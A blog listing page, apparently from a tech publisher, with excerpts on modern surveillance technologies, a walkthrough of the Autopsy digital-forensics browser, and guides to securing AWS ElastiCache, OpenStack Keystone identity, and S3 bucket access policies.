believed that investigators could find a family match for the DNA of anyone who has committed a crime in America. In simple terms, whether you want it or not, the law enforcement has the DNA of every individual in the country available to them. Domain Awareness Centers (DAC) bring the Truman Show to life The 400,000 Residents of Oakland, California discovered in 2012, that they had been the subject of an undisclosed mass surveillance project, by the local police force, for many years. Feeds from CCTV cameras installed in Oakland’s suburbs were augmented with weather information feeds, social media feeds and extracted email conversations, as well as a variety of other sources. The scheme began at Oakland’s port with Federal funding as part of a national response to the events of 9.11.2001 but was extended to cover the near half million residents of the city. Hundreds of additional video cameras were installed, along with gunshot recognition microphones and some of the other surveillance technologies provided in this article. The police force conducting the surveillance had no policy on what information was recorded or for how long it was kept. Internet connected toys spy on children The FBI has warned Americans that children’s toys connected to the internet ‘could put the privacy and safety of children at risk.' Children’s toy Hello Barbie was specifically admonished for poor privacy controls as part of the FBI’s press release. Internet connected toys could be used to record video of children at any point in the day or, conceivably, to relay a human voice, making it appear to the child that the toy was talking to them. Oracle suggest Google’s Android operating system routinely tracks users’ position even when maps are turned off In Australia, two American companies have been involved in a disagreement about the potential monitoring of Android phones. Oracle accused Google of monitoring users’ location (including altitude), even when mapping software is turned off on the device. The tracking is performed in the background of their phone. In Australia alone, Oracle suggested that Google’s monitoring could involve around 1GB of additional mobile data every month, costing users nearly half a billion dollars a year, collectively. Amazon facial recognition in real time helps US law enforcement services Amazon are providing facial recognition services which take a feed from public video cameras, to a number of US Police Forces. Amazon can match images taken in real time to a database containing ‘millions of faces.’ Are there any state or Federal rules in place to govern police facial recognition? Wired reported that there are ‘more or less none.’ Amazon’s scheme is a trial taking place in Florida. There are at least 2 other companies offering similar schemes in the US to law enforcement services. Big glass microphone can help agencies keep an ear on the ground Project ‘Big Glass Microphone’ uses the vibrations that the movements of cars (among other things) cause in the buried fiber optic telecommunications links. A successful test of the technology has been undertaken on the fiber optic cables which run underground on the Stanford University Campus, to record vehicle movements. Fiber optic links now make up the backbone of much data transport infrastructure - the way your phone and computer connect to the internet. Big glass microphone as it stands is the first step towards ‘invisible’ monitoring of people and their assets. It appears the FBI now have the ability to crack/access any phone Those in the know suggest that Apple’s iPhone is the most secure smart device against government surveillance. In 2016, this was put to the test. The Justice Department came into possession of an iPhone allegedly belonging to one of the San Bernadino shooters and ultimately sued Apple in an attempt to force the company to grant access to it, as part of their investigation. The case was ultimately dropped leading some to speculate that NAND mirroring techniques were used to gain access to the phone without Apple’s assistance, implying that even the most secure phones can now be accessed by authorities. Cornell University’s lie detecting algorithm Groundbreaking work by Cornell University will provide ‘at a distance’ access to information that previously required close personal access to an accused subject. Cornell’s solution interprets feeds from a number of video cameras on subjects and analyses the results to judge their heart rate. They believe the system can be used to determine if someone is lying from behind a screen. University of Southern California can anticipate social unrest with social media feeds Researchers at the University Of Southern California have developed an AI tool to study Social Media posts and determine whether those writing them are likely to cause Social Unrest. The software claims to have identified an association between both the volume of tweets written / the content of those tweets and protests turning physical. They can now offer advice to law enforcement on the likelihood of a protest turning violent so they can be properly prepared based on this information. The UK, an epicenter of AI progress, is not far behind in tracking people The UK has a similarly impressive array of tools at its disposal to watch the people that representatives of the country feels may be required. Given the close levels of cooperation between the UK and US governments, it is likely that many of these UK facilities are shared with the US and other NATO partners. Project stingray – fake cell phone/mobile phone ‘towers’ to intercept communications Stingray is a brand name for an IMSI (the unique identifier on a SIM card) tracker. They ‘spoof’ real towers, presenting themselves as the closest mobile phone tower. This ‘fools’ phones in to connecting to them. The technology has been used to spy on criminals in the UK but it is not just the UK government which use Stingray or its equivalents. The Washington Post reported in June 2018 that a number of domestically compiled intelligence reports suggest that foreign governments acting on US soil, including China and Russia, have been eavesdropping on the Whitehouse, using the same technology. UK developed Spyware is being used by authoritarian regimes Gamma International is a company based in Hampshire UK, which provided the (notably authoritarian) Egyptian government with a facility to install what was effectively spyware delivered with a virus on to computers in their country. Once installed, the software permitted the government to monitor private digital interactions, without the need to engage the phone company or ISP offering those services. Any internet based technology could be tracked, assisting in tracking down individuals who may have negative feelings about the Egyptian government. Individual arrested when his fingerprint was taken from a WhatsApp picture of his hand A Drug Dealer was pictured holding an assortment of pills in the UK two months ago. The image of his hand was used to extract an image of his fingerprint. From that, forensic scientists used by UK police, confirmed that officers had arrested the correct person and associated him with drugs. AI solutions to speed up evidence processing including scanning laptops and phones UK police forces are trying out AI software to speed up processing evidence from digital devices. A dozen departments around the UK are using software, called Cellebrite, which employs AI algorithms to search through data found on devices, including phones and laptops. Cellbrite can recognize images that contain child abuse, accepts feeds from multiple devices to see when multiple owners were in the same physical location at the same time and can read text from screenshots. Officers can even feed it photos of suspects to see if a picture of them show up on someone’s hard drive. China takes the surveillance biscuit and may show us a glimpse of the future There are 600 million mobile phone users in China, each producing a great deal of information about their users. China has a notorious record of human rights abuses and the ruling Communist Party takes a controlling interest (a board seat) in many of their largest technology companies, to ensure the work done is in the interest of the party as well as profitable for the corporate. As a result, China is on the front foot when it comes to both AI and surveillance technology. China’s surveillance tools could be a harbinger of the future in the Western world. Chinese cities will be run by a private company Alibaba, China’s equivalent of Amazon, already has control over the traffic lights in one Chinese city, Hangzhou. Alibaba is far from shy about it’s ambitions. It has 120,000 developers working on the problem and intends to commercialise and sell the data it gathers about citizens. The AI based product they’re using is called CityBrain. In the future, all Chinese cities could well all be run by AI from the Alibaba corporation the idea is to use this trial as a template for every city. The technology is likely to be placed in Kuala Lumpur next. In the areas under CityBrain’s control, traffic speeds have increased by 15% already. However, some of those observing the situation have expressed concerns not just about (the lack of) oversight on CityBrain’s current capabilities but the potential for future abuse. What to make of this incredible list of surveillance capabilities Facilities like Mapquest’s new mapping service are beguiling. They’re clever ideas which create a better works. Similar technology, however, behind the scenes, is being adopted by law enforcement bodies in an ever growing list of countries. Even for someone who understands cutting edge technology, the sum of those facilities may be surprising. Literally any aspect of your behaviour, from the way you walk, to your face, your heatmap and, of course, the contents of your phone and laptops can now be monitored. Law enforcement can access and review information feeds with Artificial Intelligence software, to process and summarise findings quickly. In some cases, this is being done without the need for a warrant. Concerningly, these advances seem to be coming without policy or, in many cases any form of oversight. We must change how we think about AI, urge AI founding fathers  
Read more
  • 0
  • 0
  • 3472

article-image-digital-forensics-using-autopsy
Savia Lobo
24 May 2018
10 min read
Save for later

Getting started with Digital forensics using Autopsy

Savia Lobo
24 May 2018
10 min read
Digital forensics involves the preservation, acquisition, documentation, analysis, and interpretation of evidence from various storage media types. It is not only limited to laptops, desktops, tablets, and mobile devices but also extends to data in transit which is transmitted across public or private networks. In this tutorial, we will cover how one can carry out digital forensics with Autopsy. Autopsy is a digital forensics platform and graphical interface to the sleuth kit and other digital forensics tools. This article is an excerpt taken from the book, 'Digital Forensics with Kali Linux', written by Shiva V.N. Parasram. Let's proceed with the analysis using the Autopsy browser by first getting acquainted with the different ways to start Autopsy. Starting Autopsy Autopsy can be started in two ways. The first uses the Applications menu by clicking on Applications | 11 - Forensics | autopsy: Alternatively, we can click on the Show applications icon (last item in the side menu) and type autopsy into the search bar at the top-middle of the screen and then click on the autopsy icon: Once the autopsy icon is clicked, a new terminal is opened showing the program information along with connection details for opening The Autopsy Forensic Browser. In the following screenshot, we can see that the version number is listed as 2.24 with the path to the Evidence Locker folder as /var/lib/autopsy: To open the Autopsy browser, position the mouse over the link in the terminal, then right-click and choose Open Link, as seen in the following screenshot: Creating a new case To create a new case, follow the given steps: When the Autopsy Forensic Browser opens, investigators are presented with three options. Click on NEW CASE: Enter details for the Case Name, Description, and Investigator Names. For the Case Name, I've entered SP-8-dftt, as it closely matches the image name (8-jpeg-search.dd), which we will be using for this investigation. Once all information is entered, click NEW CASE: Several investigator name fields are available, as there may be instances where several investigators may be working together. The locations of the Case directory and Configuration file are displayed and shown as created.  It's important to take note of the case directory location, as seen in the screenshot: Case directory (/var/lib/autopsy/SP-8-dftt/) created. Click ADD HOST to continue: Enter the details for the Host Name (name of the computer being investigated) and the Description of the host. Optional settings: Time zone: Defaults to local settings, if not specified Timeskew Adjustment: Adds a value in seconds to compensate for time differences Path of Alert Hash Database: Specifies the path of a created database of known bad hashes Path of Ignore Hash Database: Specifies the path of a created database of known good hashes similar to the NIST NSRL: Click on the ADD HOST button to continue. Once the host is added and directories are created, we add the forensic image we want to analyze by clicking the ADD IMAGE button: Click on the ADD IMAGE FILE button to add the image file: To import the image for analysis, the full path must be specified. On my machine, I've saved the image file (8-jpeg-search.dd) to the Desktop folder. As such, the location of the file would be /root/Desktop/ 8-jpeg-search.dd. For the Import Method, we choose Symlink. This way the image file can be imported from its current location (Desktop) to the Evidence Locker without the risks associated with moving or copying the image file. If you are presented with the following error message, ensure that the specified image location is correct and that the forward slash (/) is used: Upon clicking Next, the Image File Details are displayed. To verify the integrity of the file, select the radio button for Calculate the hash value for this image, and select the checkbox next to Verify hash after importing? The File System Details section also shows that the image is of a ntfs partition. Click on the ADD button to continue: After clicking the ADD button in the previous screenshot, Autopsy calculates the MD5 hash and links the image into the evidence locker. Press OK to continue: At this point, we're just about ready to analyze the image file. If there are multiple cases listed in the gallery area from any previous investigations you may have worked on, be sure to choose the 8-jpeg-search.dd file and case: Before proceeding, we can click on the IMAGE DETAILS option. This screen gives detail such as the image name, volume ID, file format, file system, and also allows for the extraction of ASCII, Unicode, and unallocated data to enhance and provide faster keyword searches. Click on the back button in the browser to return to the previous menu and continue with the analysis: Before clicking on the ANALYZE button to start our investigation and analysis, we can also verify the integrity of the image by creating an MD5 hash, by clicking on the IMAGE INTEGRITY button: Several other options exist such as FILE ACTIVITY TIMELINES, HASH DATABASES, and so on. We can return to these at any point in the investigation. After clicking on the IMAGE INTEGRITY button, the image name and hash are displayed. Click on the VALIDATE button to validate the MD5 hash: The validation results are displayed in the lower-left corner of the Autopsy browser window: We can see that our validation was successful, with matching MD5 hashes displayed in the results. Click on the CLOSE button to continue. To begin our analysis, we click on the ANALYZE button: Analysis using Autopsy Now that we've created our case, added host information with appropriate directories, and added our acquired image, we get to the analysis stage. After clicking on the ANALYZE button (see the previous screenshot), we're presented with several options in the form of tabs, with which to begin our investigation: Let's look at the details of the image by clicking on the IMAGE DETAILS tab. In the following snippet, we can see the Volume Serial Number and the operating system (Version) listed as Windows XP: Next, we click on the FILE ANALYSIS tab. This mode opens into File Browsing Mode, which allows the examination of directories and files within the image. Directories within the image are listed by default in the main view area: In File Browsing Mode, directories are listed with the Current Directory specified as C:/. For each directory and file, there are fields showing when the item was WRITTEN, ACCESSED, CHANGED, and CREATED, along with its size and META data: WRITTEN: The date and time the file was last written to ACCESSED: The date and time the file was last accessed (only the date is accurate) CHANGED: The date and time the descriptive data of the file was modified CREATED: The data and time the file was created META: Metadata describing the file and information about the file: For integrity purposes, MD5 hashes of all files can be made by clicking on the GENERATE MD5 LIST OF FILES button. Investigators can also make notes about files, times, anomalies, and so on, by clicking on the ADD NOTE button: The left pane contains four main features that we will be using: Directory Seek: Allows for the searching of directories File Name Search: Allows for the searching of files by Perl expressions or filenames ALL DELETED FILES: Searches the image for deleted files EXPAND DIRECTORIES: Expands all directories for easier viewing of contents By clicking on EXPAND DIRECTORIES, all contents are easily viewable and accessible within the left pane and main window. The + next to a directory indicates that it can be further expanded to view subdirectories (++) and their contents: To view deleted files, we click on the ALL DELETED FILES button in the left pane. Deleted files are marked in red and also adhere to the same format of WRITTEN, ACCESSED, CHANGED, and CREATED times. From the following screenshot, we can see that the image contains two deleted files: We can also view more information about this file by clicking on its META entry. By viewing the metadata entries of a file (last column to the right), we can also view the hexadecimal entries for the file, which may give the true file extensions, even if the extension was changed. In the preceding screenshot, the second deleted file (file7.hmm) has a peculiar file extension of .hmm. Click on the META entry (31-128-3) to view the metadata: Under the Attributes section, click on the first cluster labelled 1066 to view header information of the file: We can see that the first entry is .JFIF, which is an abbreviation for JPEG File Interchange Format. This means that the file7.hmm file is an image file but had its extension changed to .hmm. Sorting files Inspecting the metadata of each file may not be practical with large evidence files. For such an instance, the FILE TYPE feature can be used. This feature allows for the examination of existing (allocated), deleted (unallocated), and hidden files. Click on the FILE TYPE tab to continue: Click Sort files into categories by type (leave the default-checked options as they are) and then click OK to begin the sorting process: Once sorting is complete, a results summary is displayed. In the following snippet, we can see that there are five Extension Mismatches: To view the sorted files, we must manually browse to the location of the output folder, as Autopsy 2.4 does not support viewing of sorted files. To reveal this location, click on View Sorted Files in the left pane: The output folder locations will vary depending on the information specified by the user when first creating the case, but can usually be found at /var/lib/autopsy/<case name>/<host name>/output/sorter-vol#/index.html. Once the index.html file has been opened, click on the Extension Mismatch link: The five listed files with mismatched extensions should be further examined by viewing metadata content, with notes added by the investigator. Reopening cases in Autopsy Cases are usually ongoing and can easily be restarted by starting Autopsy and clicking on OPEN CASE: In the CASE GALLERY, be sure to choose the correct case name and, from there, continue your examination: To recap, we looked at forensics using the Autopsy Forensic Browser with The Sleuth Kit. Compared to individual tools, Autopsy has case management features and supports various types of file analysis, searching, and sorting of allocated, unallocated, and hidden files. Autopsy can also perform hashing on a file and directory levels to maintain evidence integrity. If you enjoyed reading this article, do check out, 'Digital Forensics with Kali Linux' to take your forensic abilities and investigations to a professional level, catering to all aspects of a digital forensic investigation from hashing to reporting. What is Digital Forensics? IoT Forensics: Security in an always connected world where things talk Working with Forensic Evidence Container Recipes
Read more
  • 0
  • 0
  • 27384

article-image-how-to-secure-elasticcache-in-aws
Savia Lobo
11 May 2018
5 min read
Save for later

How to secure ElasticCache in AWS

Savia Lobo
11 May 2018
5 min read
AWS offers services to handle the cache management process. Earlier, we were using Memcached or Redis installed on VM, which was a very complex and tough task to manage in terms of ensuring availability, patching, scalability, and security. [box type="shadow" align="" class="" width=""]This article is an excerpt taken from the book,'Cloud Security Automation'. In this book, you'll learn the basics of why cloud security is important and how automation can be the most effective way of controlling cloud security.[/box] On AWS, we have this service available as ElastiCache. This gives you the option to use any engine (Redis or Memcached) to manage your cache. It's a scalable platform that will be managed by AWS in the backend. ElastiCache provides a scalable and high-performance caching solution. It removes the complexity associated with creating and managing distributed cache clusters using Memcached or Redis. Now, let's look at how to secure ElastiCache. Secure ElastiCache in AWS For enhanced security, we deploy ElastiCache clusters inside VPC. When they are deployed inside VPC, we can use a security group and NACL to add a level of security on the communication ports at network level. Apart from this, there are multiple ways to enable security for ElastiCache. VPC-level security Using a security group at VPC—when we deploy AWS ElastiCache in VPC, it gets associated with a subnet, a security group, and the routing policy of that VPC. Here, we define a rule to communicate with the ElastiCache cluster on a specific port. ElastiCache clusters can also be accessed from on-premise applications using VPN and Direct Connect. Authentication and access control We use IAM in order to implement the authentication and access control on ElastiCache. For authentication, you can have the following identity type: Root user: It's a superuser that is created while setting up an AWS account. It has super administrator privileges for all the AWS services. However, it's not recommended to use the root user to access any of the services. IAM user: It's a user identity in your AWS account that will have a specific set of permissions for accessing the ElastiCache service. IAM role: We also can define an IAM role with a specific set of permissions and associate it with the services that want to access ElastiCache. It basically generates temporary access keys to use ElastiCache. Apart from this, we can also specify federated access to services where we have an IAM role with temporary credentials for accessing the service. To access ElastiCache, service users or services must have a specific set of permissions such as create, modify, and reboot the cluster. For this, we define an IAM policy and associate it with users or roles. Let's see an example of an IAM policy where users will have permission to perform system administration activity for ElastiCache cluster: { "Version": "2012-10-17", "Statement":[{ "Sid": "ECAllowSpecific", "Effect":"Allow", "Action":[ "elasticache:ModifyCacheCluster", "elasticache:RebootCacheCluster", "elasticache:DescribeCacheClusters", "elasticache:DescribeEvents", "elasticache:ModifyCacheParameterGroup", "elasticache:DescribeCacheParameterGroups", "elasticache:DescribeCacheParameters", "elasticache:ResetCacheParameterGroup", "elasticache:DescribeEngineDefaultParameters"], "Resource":"*" } ] } Authenticating with Redis authentication AWS ElastiCache also adds an additional layer of security with the Redis authentication command, which asks users to enter a password before they are granted permission to execute Redis commands on a password-protected Redis server. When we use Redis authentication, there are the following few constraints for the authentication token while using ElastiCache: Passwords must have at least 16 and a maximum of 128 characters Characters such as @, ", and / cannot be used in passwords Authentication can only be enabled when you are creating clusters with the in-transit encryption option enabled The password defined during cluster creation cannot be changed To make the policy harder or more complex, there are the following rules related to defining the strength of a password: A password must include at least three characters of the following character types: Uppercase characters Lowercase characters Digits Non-alphanumeric characters (!, &, #, $, ^, <, >, -) A password must not contain any word that is commonly used A password must be unique; it should not be similar to previous passwords Data encryption AWS ElastiCache and EC2 instances have mechanisms to protect against unauthorized access of your data on the server. ElastiCache for Redis also has methods of encryption for data run-in on Redis clusters. Here, too, you have data-in-transit and data-at-rest encryption methods. Data-in-transit encryption ElastiCache ensures the encryption of data when in transit from one location to another. ElastiCache in-transit encryption implements the following features: Encrypted connections: In this mode, SSL-based encryption is enabled for server and client communication Encrypted replication: Any data moving between the primary node and the replication node are encrypted Server authentication: Using data-in-transit encryption, the client checks the authenticity of a connection—whether it is connected to the right server Client authentication: After using data-in-transit encryption, the server can check the authenticity of the client using the Redis authentication feature Data-at-rest encryption ElastiCache for Redis at-rest encryption is an optional feature that increases data security by encrypting data stored on disk during sync and backup or snapshot operations. However, there are the following few constraints for data-at-rest encryption: It is supported only on replication groups running Redis version 3.2.6. It is not supported on clusters running Memcached. It is supported only for replication groups running inside VPC. Data-at-rest encryption is supported for replication groups running on any node type. During the creation of the replication group, you can define data-at-rest encryption. Data-at-rest encryption once enabled, cannot be disabled. To summarize, we learned how to secure ElastiCache and ensured security for PaaS services, such as database and analytics services. If you've enjoyed reading this article, do check out 'Cloud Security Automation' for hands-on experience of automating your cloud security and governance. How to start using AWS AWS Sydney Summit 2018 is all about IoT AWS Fargate makes Container infrastructure management a piece of cake    
Read more
  • 0
  • 0
  • 11388
article-image-secure-private-cloud-iam
Savia Lobo
10 May 2018
11 min read
Save for later

How to secure a private cloud using IAM

Savia Lobo
10 May 2018
11 min read
In this article, we look at securing the private cloud using IAM. For IAM, OpenStack uses the Keystone project. Keystone provides the identity, token, catalog, and policy services, which are used specifically by OpenStack services. It is organized as a group of internal services exposed on one or many endpoints. For example, an authentication call validates the user and project credentials with the identity service. [box type="shadow" align="" class="" width=""]This article is an excerpt from the book,'Cloud Security Automation'. In this book, you'll learn how to work with OpenStack security modules and learn how private cloud security functions can be automated for better time and cost-effectiveness.[/box] Authentication Authentication is an integral part of an OpenStack deployment and so we must be careful about the system design. Authentication is the process of confirming a user's identity, which means that a user is actually who they claim to be. For example, providing a username and a password when logging into a system. Keystone supports authentication using the username and password, LDAP, and external authentication methods. After successful authentication, the identity service provides the user with an authorization token, which is further used for subsequent service requests. Transport Layer Security (TLS) provides authentication between services and users using X.509 certificates. The default mode for TLS is server-side only authentication, but we can also use certificates for client authentication. However, in authentication, there can also be the case where a hacker is trying to access the console by guessing your username and password. If we have not enabled the policy to handle this, it can be disastrous. For this, we can use the Failed Login Policy, which states that a maximum number of attempts are allowed for a failed login; after that, the account is blocked for a certain number of hours and the user will also get a notification about it. However, the identity service provided in Keystone does not provide a method to limit access to accounts after repeated unsuccessful login attempts. For this, we need to rely on an external authentication system that blocks out an account after a configured number of failed login attempts. Then, the account might only be unlocked with further side-channel intervention, or on request, or after a certain duration. We can use detection techniques to the fullest only when we have a prevention method available to save them from damage. In the detection process, we frequently review the access control logs to identify unauthorized attempts to access accounts. During the review of access control logs, if we find any hints of a brute force attack (where the user tries to guess the username and password to log in to the system), we can define a strong username and password or block the source of the attack (IP) through firewall rules. When we define firewall rules on Keystone node, it restricts the connection, which helps to reduce the attack surface. Apart from this, reviewing access control logs also helps to examine the account activity for unusual logins and suspicious actions, so that we can take corrective actions such as disabling the account. To increase the level of security, we can also utilize MFA for network access to the privileged user accounts. Keystone supports external authentication services through the Apache web server that can provide this functionality. Servers can also enforce client-side authentication using certificates. This will help to get rid of brute force and phishing attacks that may compromise administrator passwords. Authentication methods – internal and external Keystone stores user credentials in a database or may use an LDAP-compliant directory server. The Keystone identity database can be kept separate from databases used by other OpenStack services to reduce the risk of a compromise of the stored credentials. When we use the username and password to authenticate, identity does not apply policies for password strength, expiration, or failed authentication attempts. For this, we need to implement external authentication services. To integrate an external authentication system or organize an existing directory service to manage users account management, we can use LDAP. LDAP simplifies the integration process. In OpenStack authentication and authorization, the policy may be delegated to another service. For example, an organization that is going to deploy a private cloud and already has a database of employees and users in an LDAP system. Using this LDAP as an authentication authority, requests to the Identity service (Keystone) are transferred to the LDAP system, which allows or denies requests based on its policies. After successful authentication, the identity service generates a token for access to the authorized services. Now, if the LDAP has already defined attributes for the user such as the admin, finance, and HR departments, these must be mapped into roles and groups within identity for use by the various OpenStack services. We need to define this mapping into Keystone node configuration files stored at /etc/keystone/keystone.conf. Keystone must not be allowed to write to the LDAP used for authentication outside of the OpenStack Scope, as there is a chance to allow a sufficiently privileged Keystone user to make changes to the LDAP directory, which is not desirable from a security point of view. This can also lead to unauthorized access of other information and resources. So, if we have other authentication providers such as LDAP or Active Directory, then user provisioning always happens at other authentication provider systems. For external authentication, we have the following methods: MFA: The MFA service requires the user to provide additional layers of information for authentication such as a one-time password token or X.509 certificate (called MFA token). Once MFA is implemented, the user will have to enter the MFA token after putting the user ID and password in for a successful login. Password policy enforcement: Once the external authentication service is in place, we can define the strength of the user passwords to conform to the minimum standards for length, diversity of characters, expiration, or failed login attempts. Keystone also supports TLS-based client authentication. TLS client authentication provides an additional authentication factor, apart from the username and password, which provides greater reliability on user identification. It reduces the risk of unauthorized access when usernames and passwords are compromised. However, TLS-based authentication is not cost effective as we need to have a certificate for each of the clients. Authorization Keystone also provides the option of groups and roles. Users belong to groups where a group has a list of roles. All of the OpenStack services, such as Cinder, Glance, nova, and Horizon, reference the roles of the user attempting to access the service. OpenStack policy enforcers always consider the policy rule associated with each resource and use the user’s group or role, and their association, to determine and allow or deny the service access. Before configuring roles, groups, and users, we should document your required access control policies for the OpenStack installation. The policies must be as per the regulatory or legal requirements of the organization. Additional changes to the access control configuration should be done as per the formal policies. These policies must include the conditions and processes for creating, deleting, disabling, and enabling accounts, and for assigning privileges to the accounts. One needs to review these policies from time to time and ensure that the configuration is in compliance with the approved policies. For user creation and administration, there must be a user created with the admin role in Keystone for each OpenStack service. This account will provide the service with the authorization to authenticate users. Nova (compute) and Swift (object storage) can be configured to use the Identity service to store authentication information. For the test environment, we can have tempAuth, which records user credentials in a text file, but it is not recommended for the production environment. The OpenStack administrator must protect sensitive configuration files from unauthorized modification with mandatory access control frameworks such as SELinux or DAC. Also, we need to protect the Keystone configuration files, which are stored at /etc/keystone/keystone.conf, and also the X.509 certificates. It is recommended that cloud admin users must authenticate using the identity service (Keystone) and an external authentication service that supports two-factor authentication. Getting authenticated with two-factor authentication reduces the risk of compromised passwords. It is also recommended in the NIST guideline called NIST 800-53 IA-2(1). Which defines MFA for network access to privileged accounts, when one factor is provided by a separate device from the system being accessed. Policy, tokens, and domains In OpenStack, every service defines the access policies for its resources in a policy file, where a resource can be like an API access, it can create and attach Cinder volume, or it can create an instance. The policy rules are defined in JSON format in a file called policy.json. Only administrators can modify the service-based policy.json file, to control the access to the various resources. However, one has to also ensure that any changes to the access control policies do not unintentionally breach or create an option to breach the security of any resource. Any changes made to policy.json are applied immediately and it does not need any service restart. After a user is authenticated, a token is generated for authorization and access to an OpenStack environment. A token can have a variable lifespan, but the default value is 1 hour. It is also recommended to lower the lifespan of the token to a certain level so that within the specified timeframe the internal service can complete the task. If the token expires before task completion, the system can be unresponsive. Keystone also supports token revocation. For this, it uses an API to revoke a token and to list the revoked tokens. In OpenStack Newton release, there are four supported token types: UUID, PKI, PKIZ, and fernet. After the OpenStack Ocata release, there are two supported token types: UUID and fernet. We'll see all of these token types in detail here: UUID: These tokens are persistent tokens. UUID tokens are 32 bytes in length, which must be persisted in the backend. They are stored in the Keystone backend, along with the metadata for authentication. All of the clients must pass their UUID token to the Keystone (identity service) in order to validate it. PKI and PKIZ: These are signed documents that contain the authentication content, as well as the service catalog. The difference between the PKI and PKIZ is that PKIZ tokens are compressed to help mitigate the size issues of PKI (sometimes PKI tokens becomes very long). Both of these tokens have become obsolete after the Ocata release. The length of PKI and PKIZ tokens typically exceeds 1,600 bytes. The Identity service uses public and private key pairs and certificates in order to create and validate these tokens. Fernet: These tokens are the default supported token provider for OpenStack Pike Release. It is a secure messaging format explicitly designed for use in API tokens. They are nonpersistent, lightweight (fall in the range of 180 to 240 bytes), and reduce the operational overhead. Authentication and authorization metadata is neatly bundled into a message-packed payload, which is then encrypted and signed in as a fernet token. In the OpenStack, the Keystone Service domain is a high-level container for projects, users, and groups. Domains are used to centrally manage all Keystone-based identity components. Compute, storage, and other resources can be logically grouped into multiple projects, which can further be grouped under a master account. Users of different domains can be represented in different authentication backends and have different attributes that must be mapped to a single set of roles and privileges in the policy definitions to access the various service resources. Domain-specific authentication drivers allow the identity service to be configured for multiple domains, using domain-specific configuration files stored at keystone.conf. Federated identity Federated identity enables you to establish trusts between identity providers and the cloud environment (OpenStack Cloud). It gives you secure access to cloud resources using your existing identity. You do not need to remember multiple credentials to access your applications. Now, the question is, what is the reason for using federated identity? This is answered as follows: It enables your security team to manage all of the users (cloud or noncloud) from a single identity application It enables you to set up different identity providers on the basis of the application that somewhere creates an additional workload for the security team and leads the security risk as well It gives ease of life to users by proving them a single credential for all of the apps so that they can save the time they spend on the forgot password page Federated identity enables you to have a single sign-on mechanism. We can implement it using SAML 2.0. To do this, you need to run the identity service provider under Apache. We learned about securing your private cloud and the authentication process therein. If you've enjoyed this article, do check out 'Cloud Security Automation' for a hands-on experience of automating your cloud security and governance. Top 5 cloud security threats to look out for in 2018 Cloud Security Tips: Locking Your Account Down with AWS Identity Access Manager (IAM)
Read more
  • 0
  • 0
  • 3735

article-image-amazon-s3-security-access-policies
Savia Lobo
03 May 2018
7 min read
Save for later

Amazon S3 Security access and policies

Savia Lobo
03 May 2018
7 min read
In this article, you will get to know about Amazon S3, and the security access and policies associated with it.  AWS provides you with S3 as the object storage, where you can store your object files from 1 KB to 5 TB in size at a low cost. It's highly secure, durable, and scalable, and has unlimited capacity. It allows concurrent read/write access to objects by separate clients and applications. You can store any type of file in AWS S3 storage. [box type="shadow" align="" class="" width=""]This article is an excerpt taken from the book,' Cloud Security Automation', written by Prashant Priyam.[/box] AWS keeps multiple copies of all the data stored in the standard S3 storage, which are replicated across devices in the region to ensure the durability of 99.999999999%. S3 cannot be used as block storage. AWS S3 storage is further categorized into three different sections: S3 Standard: This is suitable when we need durable storage for files with frequent access. Reduced Redundancy Storage: This is suitable when we have less critical data that is persistent in nature. Infrequent Access (IA): This is suitable when you have durable data with nonfrequent access. You can opt for Glacier. However, in Glacier, you have a very long retrieval time. So, S3 IA becomes a suitable option. It provides the same performance as the S3 Standard storage. AWS S3 has inbuilt error correction and fault tolerance capabilities. Apart from this, in S3 you have an option to enable versioning and cross-region replication (cross-origin resource sharing (CORS)). If you want to enable versioning on any existing bucket, versioning will be enabled only for new objects in that bucket, not for existing objects. This also happens in the case of CORS, where you can enable cross-region replication, but it will be applicable only for new objects. Security in Amazon S3 S3 is highly secure storage. Here, we can enable fine-grained access policies for resource access and encryption. To enable access-level security, you can use the following: S3 bucket policy IAM access policy MFA for object deletion The S3 bucket policy is a JSON code that defines what will be accessed by whom and at what level: { "Version": "2008-10-17", "Statement": [ { "Sid": "AllowPublicRead", "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": [ "s3:GetObject" ], "Resource": [ "arn:aws:s3:::prashantpriyam/*" ] } ] } In the preceding JSON code, we have just allowed read-only access to all the objects (as defined in the Action section) for an S3 bucket named prashantpriyam (defined in the Resource section). Similar to the S3 bucket policy, we can also define an IAM policy for S3 bucket access: { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "s3:GetBucketLocation", "s3:ListAllMyBuckets" ], "Resource": "arn:aws:s3:::*" }, { "Effect": "Allow", "Action": ["s3:ListBucket"], "Resource": ["arn:aws:s3:::prashantpriyam"] }, { "Effect": "Allow", "Action": [ "s3:PutObject", "s3:GetObject", "s3:DeleteObject" ], "Resource": ["arn:aws:s3:::prashantpriyam/*"] } ] } In the preceding policy, we want to give the user full permissions on the S3 bucket from the AWS console as well. In the following section of policy (JSON code), we have granted permission to the user to get the bucket location and list all the buckets for traversal, but here we cannot perform other operations, such as getting object details from the bucket: { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "s3:GetBucketLocation", "s3:ListAllMyBuckets" ], "Resource": "arn:aws:s3:::*" }, { "Effect": "Allow", "Action": ["s3:ListBucket"], "Resource": ["arn:aws:s3:::prashantpriyam"] }, While in the second section of the policy (specified as follows), we have given permission to users to traverse into the prashantpriyam bucket and perform PUT, GET, and DELETE operations on the object: { "Effect": "Allow", "Action": [ "s3:PutObject", "s3:GetObject", "s3:DeleteObject" ], "Resource": ["arn:aws:s3:::prashantpriyam/*"] } MFA enables additional security on your account where, after password-based authentication, it asks you to provide the temporary code generated from AWS MFA. We can also use a virtual MFA such as Google Authenticator. AWS S3 supports MFA-based API, which helps to enforce MFA-based access policy on S3 bucket. Let's look at an example where we are giving users read-only access to a bucket while all other operations require an MFA token, which will expire after 600 seconds: { "Version": "2012-10-17", "Statement": [ { "Sid": "", "Effect": "Deny", "Principal": "*", "Action": "s3:*", "Resource": "arn:aws:s3:::prashantpriyam/priyam/*", "Condition": {"Null": {"aws:MultiFactorAuthAge": true }} }, { "Sid": "", "Effect": "Deny", "Principal": "*", "Action": "s3:*", "Resource": "arn:aws:s3:::prashantpriyam/priyam/*", "Condition": {"NumericGreaterThan": {"aws:MultiFactorAuthAge": 600 }} }, { "Sid": "", "Effect": "Allow", "Principal": "*", "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::prashantpriyam/*" } ] } In the preceding code, you can see that we have allowed all the operations on the S3 bucket if they have an MFA token whose life is less than 600 seconds. Apart from MFA, we can enable versioning so that S3 can automatically create multiple versions of the object to eliminate the risk of unwanted modification of data. This can be enabled with the 